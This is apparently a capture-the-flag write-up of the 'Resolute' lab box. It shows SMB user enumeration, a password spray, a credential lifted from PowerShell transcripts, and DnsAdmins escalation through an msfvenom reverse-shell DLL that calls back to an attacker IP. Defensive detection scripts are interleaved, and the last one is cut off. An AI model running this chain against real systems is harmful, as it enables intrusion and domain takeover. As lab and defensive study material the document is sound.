Nmap Enumeration
```
# Nmap 7.95 scan initiated Mon Jun 9 15:48:33 2025 as: /usr/lib/nmap/nmap -sC -sV -vv -oN nmap 10.10.10.169
Nmap scan report for 10.10.10.169
Host is up, received reset ttl 127 (0.057s latency).
Scanned at 2025-06-09 15:48:35 +08 for 28s
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
53/tcp open tcpwrapped syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-06-09 07:34:01Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2025-06-09T07:34:09
|_ start_date: 2025-06-09T07:25:05
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 52471/tcp): CLEAN (Couldn't connect)
| Check 2 (port 4297/tcp): CLEAN (Couldn't connect)
| Check 3 (port 55070/udp): CLEAN (Timeout)
| Check 4 (port 37482/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 2h05m19s, deviation: 4h02m31s, median: -14m41s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2025-06-09T00:34:08-07:00
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 9 15:49:03 2025 -- 1 IP address (1 host up) scanned in 29.48 seconds
```
SMB Enumeration
Null User Logins
```
┌──(wzwr㉿kali)-[~/htb/resolute]
└─$ crackmapexec smb 10.10.10.169 -u '' -p '' --shares
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\:
SMB 10.10.10.169 445 RESOLUTE [-] Error enumerating shares: STATUS_ACCESS_DENIED
```
Non-Existent User Logins
```
┌──(wzwr㉿kali)-[~/htb/resolute]
└─$ crackmapexec smb 10.10.10.169 -u 'DoesNotExist' -p '' --shares
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\DoesNotExist: STATUS_LOGON_FAILURE
┌──(wzwr㉿kali)-[~/htb/resolute]
└─$ crackmapexec smb 10.10.10.169 -u 'DoesNotExist' -p 'w' --shares
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\DoesNotExist:w STATUS_LOGON_FAILURE
```
List Users
```
┌──(wzwr㉿kali)-[~/htb/resolute]
└─$ crackmapexec smb 10.10.10.169 -u '' -p '' --users
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\:
SMB 10.10.10.169 445 RESOLUTE [-] Error enumerating domain users using dc ip 10.10.10.169: NTLM needs domain\username and a password
SMB 10.10.10.169 445 RESOLUTE [*] Trying with SAMRPC protocol
SMB 10.10.10.169 445 RESOLUTE [+] Enumerated domain user(s)
SMB 10.10.10.169 445 RESOLUTE megabank.local\Administrator Built-in account for administering the computer/domain
SMB 10.10.10.169 445 RESOLUTE megabank.local\Guest Built-in account for guest access to the computer/domain
SMB 10.10.10.169 445 RESOLUTE megabank.local\krbtgt Key Distribution Center Service Account
SMB 10.10.10.169 445 RESOLUTE megabank.local\DefaultAccount A user account managed by the system.
SMB 10.10.10.169 445 RESOLUTE megabank.local\ryan
SMB 10.10.10.169 445 RESOLUTE megabank.local\marko Account created. Password set to Welcome123!
SMB 10.10.10.169 445 RESOLUTE megabank.local\sunita
SMB 10.10.10.169 445 RESOLUTE megabank.local\abigail
SMB 10.10.10.169 445 RESOLUTE megabank.local\marcus
SMB 10.10.10.169 445 RESOLUTE megabank.local\sally
SMB 10.10.10.169 445 RESOLUTE megabank.local\fred
SMB 10.10.10.169 445 RESOLUTE megabank.local\angela
SMB 10.10.10.169 445 RESOLUTE megabank.local\felicia
SMB 10.10.10.169 445 RESOLUTE megabank.local\gustavo
SMB 10.10.10.169 445 RESOLUTE megabank.local\ulf
SMB 10.10.10.169 445 RESOLUTE megabank.local\stevie
SMB 10.10.10.169 445 RESOLUTE megabank.local\claire
SMB 10.10.10.169 445 RESOLUTE megabank.local\paulo
SMB 10.10.10.169 445 RESOLUTE megabank.local\steve
SMB 10.10.10.169 445 RESOLUTE megabank.local\annette
SMB 10.10.10.169 445 RESOLUTE megabank.local\annika
SMB 10.10.10.169 445 RESOLUTE megabank.local\per
SMB 10.10.10.169 445 RESOLUTE megabank.local\claude
SMB 10.10.10.169 445 RESOLUTE megabank.local\melanie
SMB 10.10.10.169 445 RESOLUTE megabank.local\zach
SMB 10.10.10.169 445 RESOLUTE megabank.local\simon
SMB 10.10.10.169 445 RESOLUTE megabank.local\naoki
```
We found a bunch of domain users, and marko's description shows that the password for new accounts was initially set to Welcome123!. We collect all this information into creds.txt, users.txt, and password.txt.
Then, we password spray to see who still has the default password.
```
┌──(wzwr㉿kali)-[~/htb/resolute]
└─$ crackmapexec smb 10.10.10.169 -u user.txt -p 'Welcome123!' --continue-on-success
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE
SMB 10.10.10.169 445 RESOLUTE [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE
```
The spray shows that melanie still has the default password!
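From the defender's side, the spray above is visible on the domain controller as a burst of failed logons across many accounts from a single source, followed by one success. This added example (not part of the original writeup) implements that detection over logon records; it assumes Security log events have already been exported as simple records with the fields used here, and SAMPLE_EVENTS is constructed data shaped like the Welcome123! spray against the megabank.local user list.

```python
"""Detect a password spray like the one above from Windows logon events.

Added example, not from the original writeup. It assumes the domain
controller's Security log has been exported as records with the fields
used below; SAMPLE_EVENTS is constructed data shaped like the spray of
Welcome123! across the megabank.local user list (4625 = failed logon,
4624 = successful logon).
"""
from collections import defaultdict
from datetime import datetime, timedelta

SPRAYED = ["ryan", "marko", "sunita", "abigail", "marcus", "sally", "fred",
           "angela", "felicia", "gustavo", "ulf", "stevie", "claire", "paulo",
           "steve", "annette", "annika", "per", "claude"]

# Constructed sample: one source host tries a single password against
# every domain user within seconds; only melanie's logon succeeds.
SAMPLE_EVENTS = (
    [{"time": "2025-06-09T07:40:00", "id": 4625, "user": u, "src": "10.10.14.13"}
     for u in SPRAYED]
    + [{"time": "2025-06-09T07:40:01", "id": 4624, "user": "melanie", "src": "10.10.14.13"},
       {"time": "2025-06-09T07:40:02", "id": 4625, "user": "zach", "src": "10.10.14.13"},
       # One user mistyping their own password from another host: not a spray.
       {"time": "2025-06-09T07:41:00", "id": 4625, "user": "sally", "src": "10.10.20.5"},
       {"time": "2025-06-09T07:41:05", "id": 4624, "user": "sally", "src": "10.10.20.5"}]
)


def detect_spray(events, window=timedelta(minutes=5), min_accounts=10):
    """Return {src: {"accounts": n, "successes": [users]}} for every source
    whose failed logons touched at least `min_accounts` distinct accounts
    inside one `window`. A spray tries one password across many accounts,
    so the tell is breadth of accounts, not repeated failures per account
    (which is what lockout thresholds catch)."""
    by_src = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        by_src[e["src"]].append(e)
    hits = {}
    for src, evs in by_src.items():
        failed = [(datetime.fromisoformat(e["time"]), e["user"])
                  for e in evs if e["id"] == 4625]
        best = 0
        for t0, _ in failed:  # sliding window anchored at each failure
            accounts = {u for t, u in failed if t0 <= t <= t0 + window}
            best = max(best, len(accounts))
        if best >= min_accounts:
            # A success from the same source during the spray is the account
            # the attacker now holds; reset it first, then the rest.
            successes = sorted({e["user"] for e in evs if e["id"] == 4624})
            hits[src] = {"accounts": best, "successes": successes}
    return hits


if __name__ == "__main__":
    for src, info in detect_spray(SAMPLE_EVENTS).items():
        print(f"{src}: {info['accounts']} accounts sprayed; "
              f"valid credentials obtained for {info['successes']}")
```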
```
┌──(wzwr㉿kali)-[~/htb/resolute]
└─$ crackmapexec smb 10.10.10.169 -u 'melanie' -p 'Welcome123!' --shares
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
SMB 10.10.10.169 445 RESOLUTE [+] Enumerated shares
SMB 10.10.10.169 445 RESOLUTE Share Permissions Remark
SMB 10.10.10.169 445 RESOLUTE ----- ----------- ------
SMB 10.10.10.169 445 RESOLUTE ADMIN$ Remote Admin
SMB 10.10.10.169 445 RESOLUTE C$ Default share
SMB 10.10.10.169 445 RESOLUTE IPC$ Remote IPC
SMB 10.10.10.169 445 RESOLUTE NETLOGON READ Logon server share
SMB 10.10.10.169 445 RESOLUTE SYSVOL READ Logon server share
```
Good!
WinRM Enumeration
```
┌──(wzwr㉿kali)-[~/htb/resolute]
└─$ crackmapexec winrm 10.10.10.169 -u 'melanie' -p 'Welcome123!'
SMB 10.10.10.169 5985 RESOLUTE [*] Windows 10 / Server 2016 Build 14393 (name:RESOLUTE) (domain:megabank.local)
HTTP 10.10.10.169 5985 RESOLUTE [*] http://10.10.10.169:5985/wsman
WINRM 10.10.10.169 5985 RESOLUTE [+] megabank.local\melanie:Welcome123! (Pwn3d!)
```
Post-Exploitation
Quick Check
```
*Evil-WinRM* PS C:\Users\melanie\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\melanie\Desktop> net user /domain
User accounts for \\
-------------------------------------------------------------------------------
abigail Administrator angela
annette annika claire
claude DefaultAccount felicia
fred Guest gustavo
krbtgt marcus marko
melanie naoki paulo
per ryan sally
simon steve stevie
sunita ulf zach
The command completed with one or more errors.
```
Files Enumeration
```
*Evil-WinRM* PS C:\> Get-ChildItem -Path C:\ -Include *.txt -force -File -Recurse -ErrorAction SilentlyContinue
Directory: C:\Program Files\VMware\VMware Tools
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/4/2018 4:12 AM 548162 open_source_licenses.txt
Directory: C:\Program Files\Windows Defender
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/16/2016 6:12 AM 1091 ThirdPartyNotices.txt
Directory: C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\en-US
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/16/2016 6:14 AM 3110 about_BeforeEach_AfterEach.help.txt
-a---- 7/16/2016 6:14 AM 6396 about_Mocking.help.txt
-a---- 7/16/2016 6:14 AM 5056 about_Pester.help.txt
-a---- 7/16/2016 6:14 AM 5945 about_should.help.txt
-a---- 7/16/2016 6:14 AM 1156 about_TestDrive.help.txt
Directory: C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\en-US
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/16/2016 6:15 AM 3110 about_BeforeEach_AfterEach.help.txt
-a---- 7/16/2016 6:15 AM 6396 about_Mocking.help.txt
-a---- 7/16/2016 6:15 AM 5056 about_Pester.help.txt
-a---- 7/16/2016 6:15 AM 5945 about_should.help.txt
-a---- 7/16/2016 6:15 AM 1156 about_TestDrive.help.txt
Directory: C:\ProgramData\VMware\VMware CAF\pme\data\input\persistence\protocol\amqpBroker_default
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/25/2019 10:48 AM 79 uri_amqp.txt
-a---- 9/25/2019 10:48 AM 63 uri_tunnel.txt
Directory: C:\ProgramData\VMware\VMware Tools\Unity Filters
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/4/2018 4:13 AM 1433 adobeflashcs3.txt
-a---- 9/4/2018 4:13 AM 1712 adobephotoshopcs3.txt
-a---- 9/4/2018 4:13 AM 588 googledesktop.txt
-a---- 9/4/2018 4:13 AM 1265 microsoftoffice.txt
-a---- 9/4/2018 4:13 AM 907 vistasidebar.txt
-a---- 9/4/2018 4:13 AM 152 visualstudio2005.txt
-a---- 9/4/2018 4:13 AM 3739 vmwarefilters.txt
-a---- 9/4/2018 4:13 AM 399 win7gadgets.txt
Directory: C:\ProgramData\VMware\VMware Tools
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/25/2019 10:49 AM 4285 manifest.txt
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
Directory: C:\Users\All Users\VMware\VMware CAF\pme\data\input\persistence\protocol\amqpBroker_default
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/25/2019 10:48 AM 79 uri_amqp.txt
-a---- 9/25/2019 10:48 AM 63 uri_tunnel.txt
Directory: C:\Users\All Users\VMware\VMware Tools\Unity Filters
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/4/2018 4:13 AM 1433 adobeflashcs3.txt
-a---- 9/4/2018 4:13 AM 1712 adobephotoshopcs3.txt
-a---- 9/4/2018 4:13 AM 588 googledesktop.txt
-a---- 9/4/2018 4:13 AM 1265 microsoftoffice.txt
-a---- 9/4/2018 4:13 AM 907 vistasidebar.txt
-a---- 9/4/2018 4:13 AM 152 visualstudio2005.txt
-a---- 9/4/2018 4:13 AM 3739 vmwarefilters.txt
-a---- 9/4/2018 4:13 AM 399 win7gadgets.txt
Directory: C:\Users\All Users\VMware\VMware Tools
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/25/2019 10:49 AM 4285 manifest.txt
Directory: C:\Users\melanie\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/9/2025 2:37 AM 34 user.txt
Directory: C:\Windows\Microsoft.NET\Framework\v4.0.30319
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/16/2016 6:15 AM 20324 ThirdPartyNotices.txt
Directory: C:\Windows\Microsoft.NET\Framework64\v4.0.30319
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/16/2016 6:14 AM 20324 ThirdPartyNotices.txt
Directory: C:\Windows\System32\catroot2
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/4/2019 4:38 AM 140035 dberr.txt
Directory: C:\Windows\System32\WindowsPowerShell\v1.0\en-US
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/20/2016 5:52 PM 3568 default.help.txt
Directory: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/20/2016 5:52 PM 3568 default.help.txt
```
We found C:\PSTranscripts, which is interesting: PowerShell transcription logging records every command a user ran, together with its arguments, and the directory is readable by melanie.
```
*Evil-WinRM* PS C:\> cat C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
```
The transcript captured ryan's password, Serv3r4Admin4cc123!, because it was passed on the command line of a net use call (and the call failed on syntax, so the password was logged twice more in the error output).
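Transcription logging is a good control, but transcripts capture whatever was typed, so a defender should treat the transcript directory as sensitive and scan it for leaked credentials to rotate. This added example (not part of the original writeup) does that scan: it parses the ParameterBinding(Invoke-Expression) entries a transcript contains and reports each command that carries a password inline, with the secret redacted. SAMPLE_TRANSCRIPT is a constructed excerpt modelled on the transcript above; the credential patterns are a starting set, not an exhaustive one.

```python
r"""Scan PowerShell transcripts for credentials passed on a command line.

Added example, not from the original writeup. Transcription logging records
every command with its arguments, so a password typed into `net use` ends up
on disk in plain text. SAMPLE_TRANSCRIPT is a constructed excerpt modelled on
the transcript found on the box; the patterns below are a starting set.
"""
import re

SAMPLE_TRANSCRIPT = r'''Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
**********************
Command start time: 20191203063455
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
'''

COMMAND_RE = re.compile(r'name="Command"; value="(.*?)"[ \t]*$', re.S | re.M)
USER_RE = re.compile(r'^Username: (.+)$', re.M)

# Each pattern: group 1 is the context to keep, group 2 the secret to redact.
SECRET_PATTERNS = [
    # `net use [drive] \\server\share <positional args>`: anything positional
    # after the share is a password (or a user/password pair when the caller
    # gets the syntax wrong, which is exactly what happened in the transcript).
    re.compile(r'(net[ \t]+use[ \t]+(?:\S+[ \t]+)?\\\\\S+)((?:[ \t]+(?!/)\S+)+)', re.I),
    re.compile(r'(/user:\S+[ \t]+)(\S+)', re.I),
    re.compile(r'''(ConvertTo-SecureString[ \t]+(?:-String[ \t]+)?['"]?)([^'"\s]+)''', re.I),
    re.compile(r'''((?:-Password|--password|password=)[ \t]*['"]?)([^'"\s]+)''', re.I),
]


def find_exposed_secrets(transcript):
    """Return one finding per command that carries a credential inline,
    with the secret replaced by [REDACTED] so the report is safe to forward."""
    user_m = USER_RE.search(transcript)
    user = user_m.group(1).strip() if user_m else "<unknown>"
    findings = []
    for m in COMMAND_RE.finditer(transcript):
        command, hit = m.group(1).strip(), False
        for pat in SECRET_PATTERNS:
            if pat.search(command):
                hit = True
                command = pat.sub(lambda mm: mm.group(1).rstrip() + " [REDACTED]", command)
        if hit:  # report only the first line; the rest is the wrapper's exit check
            findings.append({"user": user, "command": command.splitlines()[0]})
    return findings


if __name__ == "__main__":
    for f in find_exposed_secrets(SAMPLE_TRANSCRIPT):
        print(f"{f['user']}: {f['command']}")
```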
```
┌──(wzwr㉿kali)-[~/htb/resolute]
└─$ crackmapexec winrm 10.10.10.169 -u 'ryan' -p 'Serv3r4Admin4cc123!'
SMB 10.10.10.169 5985 RESOLUTE [*] Windows 10 / Server 2016 Build 14393 (name:RESOLUTE) (domain:megabank.local)
HTTP 10.10.10.169 5985 RESOLUTE [*] http://10.10.10.169:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.10.169 5985 RESOLUTE [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!)
```
Good!
Ryan Shell
```
*Evil-WinRM* PS C:\Users\ryan\Desktop> ls
Directory: C:\Users\ryan\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2019 7:34 AM 155 note.txt
*Evil-WinRM* PS C:\Users\ryan\Desktop> cat note.txt
Email to team:
- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute
*Evil-WinRM* PS C:\Users\ryan\Desktop>
```
Ryan Groups
Note that ryan belongs to DnsAdmins, which is abnormal for a regular user. Searching for ways to abuse DnsAdmins membership turns up the following technique: a member of that group can configure the DNS Server service, which runs as SYSTEM on the domain controller, to load a plugin DLL of their choosing.
First, we create a malicious DLL for the DNS service on the target machine to load:
```
┌──(wzwr㉿kali)-[~/htb/resolute]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.13 LPORT=443 -f dll -o evil.dll
```
Then, we upload this DLL to the target machine and use dnscmd to register it as the server-level plugin DLL:
```
*Evil-WinRM* PS C:\Users\ryan\Desktop> dnscmd.exe /config /serverlevelplugindll C:\Users\ryan\Desktop\evil.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
```
Then, we restart the DNS service so that it loads the DLL and triggers the payload:
```
*Evil-WinRM* PS C:\Users\ryan\Desktop> sc.exe \\resolute stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
*Evil-WinRM* PS C:\Users\ryan\Desktop> sc.exe \\resolute start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 3400
FLAGS :
```
Finally, the reverse shell connects back to our listener and we are SYSTEM:
```
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
```
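The whole DnsAdmins chain above leaves two loud artifacts on the domain controller: a write to the ServerLevelPluginDll registry value under the DNS service's Parameters key, and a stop/start of the DNS Server service moments later. This added example (not part of the original writeup) turns those into a detection rule over Sysmon registry events (ID 13) and System log service state changes (ID 7036); it assumes the events have already been exported as simple records with the fields used here, and SAMPLE_EVENTS is constructed data shaped like the activity in this writeup.

```python
r"""Detect the ServerLevelPluginDll technique used above from event data.

Added example, not from the original writeup. `dnscmd /config
/serverlevelplugindll <path>` writes the registry value
HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll,
and the DNS Server service loads that DLL as SYSTEM the next time it starts;
the restart in the writeup is what fires the payload. This detector consumes
Sysmon registry value-set events (ID 13) and System log service state
changes (ID 7036) already exported as records; SAMPLE_EVENTS is constructed.
"""
from datetime import datetime, timedelta

PLUGIN_VALUE = r"\services\dns\parameters\serverlevelplugindll"
SYSTEM32 = "c:\\windows\\system32\\"

SAMPLE_EVENTS = [
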